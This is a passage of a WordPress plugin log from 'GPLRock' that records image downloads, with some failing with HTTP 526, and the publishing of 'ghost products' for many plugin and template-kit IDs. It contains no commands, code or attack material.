GPLRock: Using pre-downloaded image for product popup-maker-forced-interaction: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-174e7513.jpg [06-Apr-2026 10:56:04 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-forced-interaction [06-Apr-2026 10:56:06 UTC] GPLRock: Image downloaded successfully for product storefront-pricing-tables (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-295f2f92.jpg [06-Apr-2026 10:56:06 UTC] GPLRock: Using pre-downloaded image for product storefront-pricing-tables: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-295f2f92.jpg [06-Apr-2026 10:56:06 UTC] GPLRock: Ghost product published with image - Product ID: storefront-pricing-tables [06-Apr-2026 10:56:08 UTC] GPLRock: Image downloaded successfully for product css-igniter-kea-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bf82d40b.jpg [06-Apr-2026 10:56:08 UTC] GPLRock: Using pre-downloaded image for product css-igniter-kea-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bf82d40b.jpg [06-Apr-2026 10:56:08 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-kea-wordpress-theme [06-Apr-2026 10:56:09 UTC] GPLRock: Image downloaded successfully for product ninja-forms-insightly-crm (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60950efc.jpg [06-Apr-2026 10:56:09 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-insightly-crm: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60950efc.jpg [06-Apr-2026 10:56:09 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-insightly-crm [06-Apr-2026 10:56:10 UTC] GPLRock: Image downloaded successfully for product ninja-forms-elavon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c19fe42c.jpg [06-Apr-2026 10:56:10 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-elavon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c19fe42c.jpg [06-Apr-2026 10:56:10 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-elavon [06-Apr-2026 10:57:02 UTC] GPLRock: Image download failed for product the-events-calendar-single-event-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:05 UTC] GPLRock: Image download failed for product the-events-calendar-single-event-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-events-calendar-single-event-page-builder-20931.webp for product the-events-calendar-single-event-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:07 UTC] GPLRock: Image download failed for product the-events-calendar-single-event-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:09 UTC] GPLRock: Image download failed for product the-events-calendar-single-event-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-events-calendar-single-event-page-builder-20931.webp for product the-events-calendar-single-event-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:11 UTC] GPLRock WARNING: Image download failed for product the-events-calendar-single-event-page-builder. URL: https://meldwp.com/wp-content/uploads/the-events-calendar-single-event-page-builder-20931.webp [06-Apr-2026 10:57:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-events-calendar-single-event-page-builder [06-Apr-2026 10:57:11 UTC] GPLRock: Image downloaded successfully for product ultimate-woocommerce-page-templates-builder-kingcomposer-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0a0d833.webp [06-Apr-2026 10:57:11 UTC] GPLRock: Using pre-downloaded image for product ultimate-woocommerce-page-templates-builder-kingcomposer-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0a0d833.webp [06-Apr-2026 10:57:11 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-woocommerce-page-templates-builder-kingcomposer-add-on [06-Apr-2026 10:57:11 UTC] GPLRock: Image download failed for product moyasar-for-latepoint-payments-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:13 UTC] GPLRock: Image download failed for product moyasar-for-latepoint-payments-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moyasar-for-latepoint-payments-addon-31081.webp for product moyasar-for-latepoint-payments-addon after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:16 UTC] GPLRock: Image download failed for product moyasar-for-latepoint-payments-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:18 UTC] GPLRock: Image download failed for product moyasar-for-latepoint-payments-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moyasar-for-latepoint-payments-addon-31081.webp for product moyasar-for-latepoint-payments-addon after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:20 UTC] GPLRock WARNING: Image download failed for product moyasar-for-latepoint-payments-addon. URL: https://meldwp.com/wp-content/uploads/moyasar-for-latepoint-payments-addon-31081.webp [06-Apr-2026 10:57:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moyasar-for-latepoint-payments-addon [06-Apr-2026 10:57:20 UTC] GPLRock: Image downloaded successfully for product affiliate-pro-affiliate-management-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-651e29ec.webp [06-Apr-2026 10:57:20 UTC] GPLRock: Using pre-downloaded image for product affiliate-pro-affiliate-management-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-651e29ec.webp [06-Apr-2026 10:57:20 UTC] GPLRock: Ghost product published with image - Product ID: affiliate-pro-affiliate-management-system [06-Apr-2026 10:57:20 UTC] GPLRock: Image download failed for product weather-wordpress-shortcode-widget-simple-weather-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:22 UTC] GPLRock: Image download failed for product weather-wordpress-shortcode-widget-simple-weather-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weather-wordpress-shortcode--widget---simple-weather-plugin-8208.webp for product weather-wordpress-shortcode-widget-simple-weather-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:24 UTC] GPLRock: Image download failed for product weather-wordpress-shortcode-widget-simple-weather-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:26 UTC] GPLRock: Image download failed for product weather-wordpress-shortcode-widget-simple-weather-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weather-wordpress-shortcode--widget---simple-weather-plugin-8208.webp for product weather-wordpress-shortcode-widget-simple-weather-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:29 UTC] GPLRock WARNING: Image download failed for product weather-wordpress-shortcode-widget-simple-weather-plugin. URL: https://meldwp.com/wp-content/uploads/weather-wordpress-shortcode--widget---simple-weather-plugin-8208.webp [06-Apr-2026 10:57:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: weather-wordpress-shortcode-widget-simple-weather-plugin [06-Apr-2026 10:57:29 UTC] GPLRock: Image download failed for product offline-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:31 UTC] GPLRock: Image download failed for product offline-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/offline-payment-gateway-plugin-32535.webp for product offline-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:33 UTC] GPLRock: Image download failed for product offline-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:35 UTC] GPLRock: Image download failed for product offline-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/offline-payment-gateway-plugin-32535.webp for product offline-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:37 UTC] GPLRock WARNING: Image download failed for product offline-payment-gateway-plugin. URL: https://meldwp.com/wp-content/uploads/offline-payment-gateway-plugin-32535.webp [06-Apr-2026 10:57:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: offline-payment-gateway-plugin [06-Apr-2026 10:57:37 UTC] GPLRock: Image download failed for product woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:39 UTC] GPLRock: Image download failed for product woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-role-based-pricing--custom-prices-for-wholesale-retail--more-2676.webp for product woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:42 UTC] GPLRock: Image download failed for product woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:44 UTC] GPLRock: Image download failed for product woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-role-based-pricing--custom-prices-for-wholesale-retail--more-2676.webp for product woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:46 UTC] GPLRock WARNING: Image download failed for product woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more. URL: https://meldwp.com/wp-content/uploads/woocommerce-role-based-pricing--custom-prices-for-wholesale-retail--more-2676.webp [06-Apr-2026 10:57:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-role-based-pricing-custom-prices-for-wholesale-retail-more [06-Apr-2026 10:57:46 UTC] GPLRock: Image download failed for product area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:48 UTC] GPLRock: Image download failed for product area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/area-wordpress-plugin---real-estate-cms-with-60-wpbakery-page-builder-addons-22937.webp for product area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:50 UTC] GPLRock: Image download failed for product area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:52 UTC] GPLRock: Image download failed for product area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/area-wordpress-plugin---real-estate-cms-with-60-wpbakery-page-builder-addons-22937.webp for product area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:55 UTC] GPLRock WARNING: Image download failed for product area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons. URL: https://meldwp.com/wp-content/uploads/area-wordpress-plugin---real-estate-cms-with-60-wpbakery-page-builder-addons-22937.webp [06-Apr-2026 10:57:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: area-wordpress-plugin-real-estate-cms-with-60-wpbakery-page-builder-addons [06-Apr-2026 10:57:55 UTC] GPLRock: Image download failed for product jobs-portal-job-board-laravel-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:57 UTC] GPLRock: Image download failed for product jobs-portal-job-board-laravel-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:57:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jobs-portal---job-board-laravel-script-5950.webp for product jobs-portal-job-board-laravel-script after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:57:59 UTC] GPLRock: Image download failed for product jobs-portal-job-board-laravel-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:58:01 UTC] GPLRock: Image download failed for product jobs-portal-job-board-laravel-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:58:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jobs-portal---job-board-laravel-script-5950.webp for product jobs-portal-job-board-laravel-script after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:58:03 UTC] GPLRock WARNING: Image download failed for product jobs-portal-job-board-laravel-script. URL: https://meldwp.com/wp-content/uploads/jobs-portal---job-board-laravel-script-5950.webp [06-Apr-2026 10:58:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jobs-portal-job-board-laravel-script [06-Apr-2026 10:58:03 UTC] GPLRock: Image download failed for product wp-custom-code-another-script-customizer-for-your-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:58:05 UTC] GPLRock: Image download failed for product wp-custom-code-another-script-customizer-for-your-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:58:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-custom-code---another-script-customizer-for-your-site-22503.webp for product wp-custom-code-another-script-customizer-for-your-site after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:58:08 UTC] GPLRock: Image download failed for product wp-custom-code-another-script-customizer-for-your-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:58:10 UTC] GPLRock: Image download failed for product wp-custom-code-another-script-customizer-for-your-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:58:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-custom-code---another-script-customizer-for-your-site-22503.webp for product wp-custom-code-another-script-customizer-for-your-site after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:58:12 UTC] GPLRock WARNING: Image download failed for product wp-custom-code-another-script-customizer-for-your-site. URL: https://meldwp.com/wp-content/uploads/wp-custom-code---another-script-customizer-for-your-site-22503.webp [06-Apr-2026 10:58:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-custom-code-another-script-customizer-for-your-site [06-Apr-2026 11:25:18 UTC] GPLRock: Image downloaded successfully for product housedeco-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60efa2eb.webp [06-Apr-2026 11:25:18 UTC] GPLRock: Using pre-downloaded image for product housedeco-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60efa2eb.webp [06-Apr-2026 11:25:18 UTC] GPLRock: Ghost product published with image - Product ID: housedeco-interior-design-elementor-template-kit [06-Apr-2026 11:25:20 UTC] GPLRock: Image downloaded successfully for product herbalist-medical-marijuana-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29f0acbb.jpg [06-Apr-2026 11:25:20 UTC] GPLRock: Using pre-downloaded image for product herbalist-medical-marijuana-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29f0acbb.jpg [06-Apr-2026 11:25:20 UTC] GPLRock: Ghost product published with image - Product ID: herbalist-medical-marijuana-store-elementor-template-kit [06-Apr-2026 11:25:21 UTC] GPLRock: Image downloaded successfully for product esthetic-wedding-photography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3413e2f2.jpg [06-Apr-2026 11:25:21 UTC] GPLRock: Using pre-downloaded image for product esthetic-wedding-photography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3413e2f2.jpg [06-Apr-2026 11:25:21 UTC] GPLRock: Ghost product published with image - Product ID: esthetic-wedding-photography-elementor-template-kit [06-Apr-2026 11:25:23 UTC] GPLRock: Image downloaded successfully for product enrique-personal-cv-resume-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4da397f8.jpg [06-Apr-2026 11:25:23 UTC] GPLRock: Using pre-downloaded image for product enrique-personal-cv-resume-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4da397f8.jpg [06-Apr-2026 11:25:23 UTC] GPLRock: Ghost product published with image - Product ID: enrique-personal-cv-resume-portfolio-elementor-template-kit [06-Apr-2026 11:25:25 UTC] GPLRock: Image downloaded successfully for product edukasi-education-online-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9b917c3.jpg [06-Apr-2026 11:25:25 UTC] GPLRock: Using pre-downloaded image for product edukasi-education-online-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9b917c3.jpg [06-Apr-2026 11:25:25 UTC] GPLRock: Ghost product published with image - Product ID: edukasi-education-online-course-elementor-template-kit [06-Apr-2026 11:25:27 UTC] GPLRock: Image downloaded successfully for product ecopeace-environment-ecology-ngo-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05e4b348.jpg [06-Apr-2026 11:25:27 UTC] GPLRock: Using pre-downloaded image for product ecopeace-environment-ecology-ngo-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05e4b348.jpg [06-Apr-2026 11:25:27 UTC] GPLRock: Ghost product published with image - Product ID: ecopeace-environment-ecology-ngo-elementor-template-kit [06-Apr-2026 11:25:29 UTC] GPLRock: Image downloaded successfully for product disrupt-tech-startup-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afd370ed.webp [06-Apr-2026 11:25:29 UTC] GPLRock: Using pre-downloaded image for product disrupt-tech-startup-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afd370ed.webp [06-Apr-2026 11:25:29 UTC] GPLRock: Ghost product published with image - Product ID: disrupt-tech-startup-business-elementor-template-kit [06-Apr-2026 11:25:30 UTC] GPLRock: Image downloaded successfully for product conztrukta-construction-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-095ae714.jpg [06-Apr-2026 11:25:30 UTC] GPLRock: Using pre-downloaded image for product conztrukta-construction-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-095ae714.jpg [06-Apr-2026 11:25:30 UTC] GPLRock: Ghost product published with image - Product ID: conztrukta-construction-service-elementor-template-kit [06-Apr-2026 11:25:32 UTC] GPLRock: Image downloaded successfully for product concretor-real-estate-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8c1f689.webp [06-Apr-2026 11:25:32 UTC] GPLRock: Using pre-downloaded image for product concretor-real-estate-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8c1f689.webp [06-Apr-2026 11:25:32 UTC] GPLRock: Ghost product published with image - Product ID: concretor-real-estate-construction-elementor-template-kit [06-Apr-2026 11:25:33 UTC] GPLRock: Image downloaded successfully for product conbiz-consultancy-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0b7446c.webp [06-Apr-2026 11:25:33 UTC] GPLRock: Using pre-downloaded image for product conbiz-consultancy-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0b7446c.webp [06-Apr-2026 11:25:33 UTC] GPLRock: Ghost product published with image - Product ID: conbiz-consultancy-business-elementor-template-kit [06-Apr-2026 11:26:45 UTC] GPLRock: Image downloaded successfully for product ait-paypal-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ccc86d0.jpg [06-Apr-2026 11:26:45 UTC] GPLRock: Using pre-downloaded image for product ait-paypal-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ccc86d0.jpg [06-Apr-2026 11:26:45 UTC] GPLRock: Ghost product published with image - Product ID: ait-paypal-payments [06-Apr-2026 11:26:47 UTC] GPLRock: Image downloaded successfully for product ait-languages (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-425f0a9c.jpg [06-Apr-2026 11:26:47 UTC] GPLRock: Using pre-downloaded image for product ait-languages: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-425f0a9c.jpg [06-Apr-2026 11:26:47 UTC] GPLRock: Ghost product published with image - Product ID: ait-languages [06-Apr-2026 11:26:48 UTC] GPLRock: Image downloaded successfully for product ait-item-reviews (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad6b411c.jpg [06-Apr-2026 11:26:48 UTC] GPLRock: Using pre-downloaded image for product ait-item-reviews: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad6b411c.jpg [06-Apr-2026 11:26:48 UTC] GPLRock: Ghost product published with image - Product ID: ait-item-reviews [06-Apr-2026 11:26:50 UTC] GPLRock: Image downloaded successfully for product ait-item-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eaf08740.jpg [06-Apr-2026 11:26:50 UTC] GPLRock: Using pre-downloaded image for product ait-item-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eaf08740.jpg [06-Apr-2026 11:26:50 UTC] GPLRock: Ghost product published with image - Product ID: ait-item-extension [06-Apr-2026 11:26:51 UTC] GPLRock: Image downloaded successfully for product ait-infobar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8d7d96a7.jpg [06-Apr-2026 11:26:51 UTC] GPLRock: Using pre-downloaded image for product ait-infobar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8d7d96a7.jpg [06-Apr-2026 11:26:51 UTC] GPLRock: Ghost product published with image - Product ID: ait-infobar [06-Apr-2026 11:26:53 UTC] GPLRock: Image downloaded successfully for product ait-get-directions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e836ed1d.jpg [06-Apr-2026 11:26:53 UTC] GPLRock: Using pre-downloaded image for product ait-get-directions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e836ed1d.jpg [06-Apr-2026 11:26:53 UTC] GPLRock: Ghost product published with image - Product ID: ait-get-directions [06-Apr-2026 11:26:54 UTC] GPLRock: Image downloaded successfully for product ait-food-menu (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35a1f81d.jpg [06-Apr-2026 11:26:54 UTC] GPLRock: Using pre-downloaded image for product ait-food-menu: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35a1f81d.jpg [06-Apr-2026 11:26:54 UTC] GPLRock: Ghost product published with image - Product ID: ait-food-menu [06-Apr-2026 11:26:56 UTC] GPLRock: Image downloaded successfully for product ait-events-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c1445389.jpg [06-Apr-2026 11:26:56 UTC] GPLRock: Using pre-downloaded image for product ait-events-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c1445389.jpg [06-Apr-2026 11:26:56 UTC] GPLRock: Ghost product published with image - Product ID: ait-events-pro [06-Apr-2026 11:26:57 UTC] GPLRock: Image downloaded successfully for product ait-easy-admin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e5750b0d.jpg [06-Apr-2026 11:26:57 UTC] GPLRock: Using pre-downloaded image for product ait-easy-admin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e5750b0d.jpg [06-Apr-2026 11:26:57 UTC] GPLRock: Ghost product published with image - Product ID: ait-easy-admin [06-Apr-2026 11:26:58 UTC] GPLRock: Image downloaded successfully for product ait-csv-import-export (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-784f1c33.jpg [06-Apr-2026 11:26:58 UTC] GPLRock: Using pre-downloaded image for product ait-csv-import-export: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-784f1c33.jpg [06-Apr-2026 11:26:58 UTC] GPLRock: Ghost product published with image - Product ID: ait-csv-import-export [06-Apr-2026 11:28:42 UTC] GPLRock: Image downloaded successfully for product homeshine-cleaning-laundry-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6a519d9.webp [06-Apr-2026 11:28:43 UTC] GPLRock: Using pre-downloaded image for product homeshine-cleaning-laundry-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6a519d9.webp [06-Apr-2026 11:28:43 UTC] GPLRock: Ghost product published with image - Product ID: homeshine-cleaning-laundry-elementor-template-kit [06-Apr-2026 11:28:44 UTC] GPLRock: Image downloaded successfully for product homco-home-interior-design-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ffb1c06d.webp [06-Apr-2026 11:28:44 UTC] GPLRock: Using pre-downloaded image for product homco-home-interior-design-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ffb1c06d.webp [06-Apr-2026 11:28:44 UTC] GPLRock: Ghost product published with image - Product ID: homco-home-interior-design-services-elementor-template-kit [06-Apr-2026 11:28:45 UTC] GPLRock: Image downloaded successfully for product hombi-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0cfa5c2b.webp [06-Apr-2026 11:28:45 UTC] GPLRock: Using pre-downloaded image for product hombi-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0cfa5c2b.webp [06-Apr-2026 11:28:45 UTC] GPLRock: Ghost product published with image - Product ID: hombi-digital-agency-elementor-template-kit [06-Apr-2026 11:28:47 UTC] GPLRock: Image downloaded successfully for product hoax-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7cfdae2.webp [06-Apr-2026 11:28:47 UTC] GPLRock: Using pre-downloaded image for product hoax-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7cfdae2.webp [06-Apr-2026 11:28:47 UTC] GPLRock: Ghost product published with image - Product ID: hoax-creative-agency-elementor-template-kit [06-Apr-2026 11:28:48 UTC] GPLRock: Image downloaded successfully for product hirelab-human-resource-recruitment-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ebf6e202.webp [06-Apr-2026 11:28:48 UTC] GPLRock: Using pre-downloaded image for product hirelab-human-resource-recruitment-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ebf6e202.webp [06-Apr-2026 11:28:48 UTC] GPLRock: Ghost product published with image - Product ID: hirelab-human-resource-recruitment-agency-elementor-template-kit [06-Apr-2026 11:28:50 UTC] GPLRock: Image downloaded successfully for product hipsound-music-streaming-podcast-elementor-template-kit (attempt 1) to: 